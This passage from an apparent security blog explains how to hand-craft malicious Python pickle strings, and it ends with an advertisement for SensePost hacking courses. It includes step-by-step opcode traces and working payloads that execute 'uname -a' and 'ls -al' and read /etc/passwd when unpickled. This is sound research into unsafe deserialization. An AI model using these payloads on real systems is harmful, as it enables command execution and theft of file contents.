  7. 't' -> pop "['uname','-a']" and MARK, push the tuple "(['uname','-a'])" onto the stack [SB] [subprocess.check_output] [(['uname','-a'])]
  8. 'R' -> pop "(['uname','-a'])" and "subprocess.check_output()", call subprocess.check_output((['uname','-a'])), push the result back on the stack [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. '.' -> pop the result off the stack and terminate [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
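The same instruction sequence can be fed to the real unpickler. This is a sketch under a few assumptions: Python 3 on a POSIX box, 'echo hello' swapped in for 'uname -a' so the result is stable, and newlines restored where the listing above shows spaces (protocol 0 terminates opcode arguments with newlines):

```python
import pickle

# Protocol 0 separates opcode arguments with newlines; the listing in the
# text shows them as spaces. 'echo hello' replaces 'uname -a' here.
payload = (
    b"csubprocess\ncheck_output\n"   # c: push subprocess.check_output
    b"((S'echo'\nS'hello'\n"         # ( ( S S: two MARKs, two strings
    b"ltR."                          # l t R .: list, tuple, call, stop
)

# Only ever unpickle data you built yourself: loading runs the command.
result = pickle.loads(payload)
print(repr(result))
```

Under Python 3 the result is a bytes object rather than a str, but it is the command's output all the same.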
The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling "string.strip()" on the output:

cstring strip (csubprocess check_output ((S'uname' S'-a' ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.

If the "check_output" method is relied upon, then we're still stuck with Python 2.7. Ideally we'd like to run "p=os.popen('ls -al');p.read()"; however, since the 'c' instruction requires modules and classes and cannot handle class instances, it is not possible to perform this directly. It bears repeating, though, that the 'R' instruction can handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python's introspection support:

  • __builtin__.getattr(foo, "attribute") returns foo.attribute, e.g. __builtin__.getattr(file, "read") -> file.read
  • __builtin__.apply(func, [args]) executes func(*[args]), i.e. it calls func with the items of the list as its arguments
Using the introspection tricks and without calling methods on class instances explicitly, we can execute "p=os.popen('ls -al'); p.read()" with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])
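Both "apply" and the "file" type are Python 2 only, so the line above will not run on Python 3. The underlying trick does carry over, though: fetch a method from the class with getattr and pass the instance in as the first argument. A minimal sketch, with a hand-written "apply" stand-in and "io.StringIO" playing the role of the open file (both are illustrative substitutions, not part of the original payload):

```python
import io

def apply(func, args):
    """Stand-in for Python 2's __builtin__.apply, which Python 3 removed."""
    return func(*args)

stream = io.StringIO("hello\n")

# Looked up on the class, 'read' is an ordinary callable that expects the
# instance as its first argument.
read = getattr(io.StringIO, "read")

# Equivalent to stream.read(), but no method is called on the instance.
result = apply(read, [stream])
print(repr(result))
```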

Converted into Pickle, this becomes:

cos popen (S'ls -al' tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

That's quite a mouthful, here's the breakdown:

  1. 'c' -> find the callable "os.popen", push it onto the stack [SB] [os.popen]
  2. '(' -> push a MARK onto the stack [SB] [os.popen] [MARK]
  3. "S'ls -al'" -> push 'ls -al' onto the stack [SB] [os.popen] [MARK] ['ls -al']
  4. 't' -> pop 'ls -al' and MARK, push ('ls -al') [SB] [os.popen] [('ls -al')]
  5. 'R' -> pop "os.popen" and "('ls -al')", call os.popen('ls -al'), push the opened file object onto the stack [SB] [<open file>]
  6. 'p0' -> store "<open file>" in register 0 [SB] [<open file>]
  7. '0' -> pop and discard topmost stack item [SB]
  8. 'c' -> find the callable '__builtin__.getattr', push it onto the stack [SB] [__builtin__.getattr]
  9. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  10. 'c' -> find the callable '__builtin__.file', push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. "S'read'" -> push 'read' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. 't' -> pop 'read', "__builtin__.file" and MARK, push (__builtin__.file, 'read') [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. 'R' -> pop "__builtin__.getattr" and "(__builtin__.file, 'read')", call __builtin__.getattr(__builtin__.file, 'read'), push the returned object onto the stack [SB] [<method object for 'file.read'>]
  14. 'p1' -> store "<method object for 'file.read'>" in register 1 [SB] [<method object for 'file.read'>]
  15. '0' -> pop and discard topmost stack item [SB]
  16. 'c' -> find the callable '__builtin__.apply', push it onto the stack [SB] [__builtin__.apply]
  17. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  18. 'g1' -> retrieve contents of register 1, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. 'g0' -> retrieve contents of register 0, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. 'l' -> pop "<open file>" and MARK, push the list "[<open file>]" [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. 't' -> pop "<method object for 'file.read'>", "[<open file>]" and MARK, push the tuple "(<method object for 'file.read'>,[<open file>])" [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. 'R' -> pop "__builtin__.apply" and "(<method object for 'file.read'>,[<open file>])", call __builtin__.apply(<method object for 'file.read'>,[<open file>]), push the returned object onto the stack [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. '.' -> pop the result off the stack and terminate [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
This is really useful, since we can now return command output in any Python version that supports Pickle.
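The breakdown can be cross-checked without executing anything, using the standard library's pickletools module. In this sketch the payload is the string from above with newlines restored where the listing shows spaces (an assumption about the original formatting):

```python
import pickletools

payload = (
    b"cos\npopen\n(S'ls -al'\ntRp0\n0"
    b"c__builtin__\ngetattr\n(c__builtin__\nfile\nS\"read\"\ntRp1\n0"
    b"c__builtin__\napply\n(g1\n(g0\nltR."
)

# genops() only parses the opcode stream; nothing is imported or called.
ops = [(opcode.name, arg) for opcode, arg, _pos in pickletools.genops(payload)]

for step, (name, arg) in enumerate(ops, start=1):
    print(step, name, "" if arg is None else repr(arg))
```

Each printed line corresponds to one numbered step of the breakdown, with 'p'/'g' shown as PUT/GET and '0' as POP. Because the payload is never loaded, this works even on Python versions where "__builtin__.file" and "__builtin__.apply" no longer exist.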

That's enough Pickle for today. I'll leave you with a final modification of the above pickle string, which reads and returns the contents of files:

c__builtin__ file (S"/etc/passwd" tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

Fri, 15 Oct 2010

Sensepost Training in November

Our next scheduled training sessions have been planned for November. If you're interested in attending, the dates and locations are:

1) HBN Bootcamp Edition 7-9th November, BlackHat Abu Dhabi

'Hacking By Numbers - Bootcamp Edition' is our 'introduction to hacking' course. It is strongly method-based and emphasizes structure, approach and thinking over tools and tricks. The course is popular with beginners, who gain their first view into the world of hacking, and experts, who appreciate the sound, structured approach.

2) HBN Extended (Cadet & Bootcamp) 9-12th November

The HBN 'Extended Edition' is simply an intensive extended version of the regular Bootcamp course. Whilst the content and structure are essentially the same as Bootcamp, the Extended Edition offers students a deeper understanding of the concepts being presented and affords them more time to practice the techniques being taught. Extended Edition is currently offered in Switzerland and South Africa only, or can be arranged on request.

3) HBN Developer Edition 15-17th November

'Hacking By Numbers - Developer Edition' is a course aimed at arming web application developers with knowledge of web application attack techniques currently being used in the 'wild' and how to combat them. Derived from our internationally acclaimed 'Hacking By Numbers' security training, this course focuses heavily on two questions: "What am I up against?" and "How can I protect my applications from attack?" During the course sample applications will be dissected to discover security related bugs hidden within the code. The class will then consider prevention, detection & cure.

More information is available on our website at www.sensepost.com/training, or contact us on training@sensepost.com or call the office on 012-460 0880 to register.